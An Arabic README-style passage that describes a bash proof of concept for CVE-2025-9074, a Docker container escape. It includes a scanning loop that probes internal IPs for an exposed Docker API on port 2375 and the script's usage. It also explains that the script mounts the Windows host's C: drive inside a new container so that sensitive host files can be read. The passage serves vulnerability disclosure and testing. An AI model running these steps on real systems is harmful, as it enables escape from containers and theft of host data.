
الـPoC الأصلي هو: https://github.com/j3r1ch0123/CVE-2025-9074. هذا هو PoC جديد بلغة bash، وذلك لأنّ ليست كل حاويات docker تحتوي على Python مثبّتة، وفي أغلب الحالات يجب تشغيله من داخل حاوية.
من داخل الحاوية، استخدم ما يلي للعثور على واجهة برمجة التطبيقات (API) الخاصة بـ docker والمعرّضة للثغرة:
for ip in 172.18.0.1 172.17.0.1 192.168.65.7; do
(echo > /dev/tcp/$ip/2375 2>/dev/null && echo "[+] $ip:2375 open") || :
done
استخدم سكربت bash هذا كما يلي:
$ ./cve-2025-9074-poc.sh <IP> <PORT> <CMD>
سينشئ السكربت صورة docker جديدة، ويركّب (mount) مجلد C: الخاص بالمضيف (Windows) إلى دليل /host_root/، ثم يشغّل الصورة، وبعدها ينفّذ الأمر (وهو غالبًا ما يكون شيئًا تحتاجه للاستغلال عن طريق قراءة الملفات الحساسة من المضيف).
يوضح ما يلي سرد محتويات الدليل المُثبَّت '/host_root/':
